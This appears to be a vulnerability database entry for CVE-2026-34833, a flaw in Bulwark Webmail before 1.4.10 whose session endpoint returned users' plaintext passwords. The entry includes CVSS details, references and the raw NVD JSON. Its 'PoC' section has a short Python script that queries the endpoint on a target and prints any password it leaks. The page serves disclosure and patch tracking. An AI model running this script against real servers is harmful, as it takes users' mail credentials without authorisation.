CVE-2026-34833

Description

Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to version 1.4.10, the GET /api/auth/session endpoint previously included the user's plaintext password in the JSON response. This exposed credentials to browser logs, local caches, and network proxie. This issue has been patched in version 1.4.10.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:* - VULNERABLE

Bulwark Webmail < 1.4.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_vulnerability(target_url):
    """
    Checks if the /api/auth/session endpoint leaks the password.
    Note: A valid session cookie might be required depending on configuration.
    """
    endpoint = f"{target_url.rstrip('/')}/api/auth/session"
    
    # In a real scenario, you might need to capture cookies from a previous login
    # headers = {'Cookie': 'session_id=...'} 
    
    try:
        response = requests.get(endpoint, timeout=10)
        
        if response.status_code == 200:
            try:
                data = response.json()
                # Check if 'password' key exists in the response
                if 'password' in data:
                    return f"[+] Vulnerability Confirmed! Password leaked: {data['password']}"
                else:
                    return "[-] Password not found in response. System might be patched."
            except ValueError:
                return "[-] Response is not valid JSON."
        else:
            return f"[-] HTTP Status Code: {response.status_code}"
            
    except Exception as e:
        return f"[!] Error occurred: {str(e)}"

# Usage
# target = "http://localhost:8080"
# print(check_vulnerability(target))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34833
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34833
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34833/
[4] VulDB https://vuldb.com/cve/CVE-2026-34833
[5] https://github.com/bulwarkmail/webmail/releases/tag/1.4.10
[6] https://github.com/bulwarkmail/webmail/security/advisories/GHSA-47pm-883h-885r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34833", "sourceIdentifier": "[email protected]", "published": "2026-04-02T20:16:27.423", "lastModified": "2026-04-09T21:13:42.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to version 1.4.10, the GET /api/auth/session endpoint previously included the user's plaintext password in the JSON response. This exposed credentials to browser logs, local caches, and network proxie. This issue has been patched in version 1.4.10."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.10", "matchCriteriaId": "B7AD4211-CACD-4302-8C34-0C0D5B00F576"}]}]}], "references": [{"url": "https://github.com/bulwarkmail/webmail/releases/tag/1.4.10", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/bulwarkmail/webmail/security/advisories/GHSA-47pm-883h-885r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}